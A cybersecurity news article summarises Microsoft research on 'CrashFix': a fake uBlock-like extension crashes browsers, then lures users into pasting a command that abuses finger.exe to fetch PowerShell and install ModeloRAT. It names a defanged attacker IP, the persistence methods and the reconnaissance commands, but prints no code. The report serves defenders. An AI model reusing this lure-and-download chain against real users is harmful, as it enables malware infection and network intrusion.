Ddos 
Crashfix Attack life cycle | Image: Microsoft
A dangerous evolution of the “ClickFix” social engineering campaign has been spotted in the wild, using a malicious browser extension to intentionally crash users’ browsers and trick them into infecting themselves. A new report from the Microsoft Defender Security Research Team details the emergence of “CrashFix,” a tactic that preys on user frustration to deploy a Python-based Remote Access Trojan (RAT).
This campaign marks a significant escalation in tradecraft. Instead of just showing a fake error message, the attackers now create a real problem—a denial-of-service (DoS) state—and then offer a “fix” that hands them the keys to the kingdom.
The attack typically begins with a user searching for an ad blocker. They are lured to a malicious advertisement that redirects them to the official Chrome Web Store, where they install a fake extension impersonating a legitimate tool like uBlock Origin Lite (often named “NexShield”).
Once installed, the extension lies dormant for about an hour. Then, it triggers a DoS attack against the browser, creating an infinite loop that consumes resources until the browser freezes or crashes.
“The updated tactic deliberately crashes victims’ browsers and then attempts to lure users into executing malicious commands under the pretext of restoring normal functionality,” the report explains.
When the user restarts their frozen browser, they are hit with a fake security warning claiming the browser “stopped abnormally.” The prompt instructs them to fix the issue by opening the Windows Run dialog (Win + R), pasting a command (Ctrl + V), and pressing Enter.
The command the user unknowingly pastes is a sophisticated infection script. Notably, it misuses a legitimate Windows utility called finger.exe, originally designed to retrieve user information from remote networks.
“A notable new tactic in this ClickFix variant is the misuse of the legitimate native Windows utility finger.exe,” Microsoft researchers note.
The script renames finger.exe to ct.exe to hide its tracks and uses it to reach out to an attacker-controlled IP address (69.67.173[.]30). It then retrieves a payload containing obfuscated PowerShell, which downloads the next stage of the attack.
The final payload is a fully capable Remote Access Trojan dubbed ModeloRAT. To ensure it runs on any machine, the attackers bundle a complete Python environment with the malware.
The RAT establishes persistence by creating a scheduled task named “SoftwareProtection,” designed to blend in with legitimate system services. It also modifies the registry to run automatically every time the user logs in.
Once active, ModeloRAT functions as a backdoor, allowing attackers to:
- Enumerate Network Info: It runs commands like nltest and net use to map out the domain and network.
- Check for Defenders: It scans for analysis tools like Wireshark and Process Hacker to avoid detection.
- Target Corporate Networks: The malware specifically checks if the machine is domain-joined, suggesting a focus on enterprise targets.
The genius—and danger—of CrashFix is its circular nature. If the user doesn’t fall for the trick the first time, the extension simply waits and crashes the browser again.
“The core malicious functionality performs a denial-of‑service attack against the victim’s browser by creating an infinite loop. Eventually, it presents a fake CrashFix security warning through a pop‑up window to further mislead the user,” researchers warn. By creating a tangible problem that persists until the “fix” is applied, the attackers significantly increase the likelihood that a stressed user will eventually comply.
For organizations, this highlights the critical need to block unauthorized browser extensions and monitor for unusual usage of native tools like finger.exe.
Related Posts:
- ClickFix Phishing: New Automated Kits Trick Users Into Manually Running Malware and Stealers
- State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- 3.2 Million Users Exposed by Malicious Browser Extensions
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
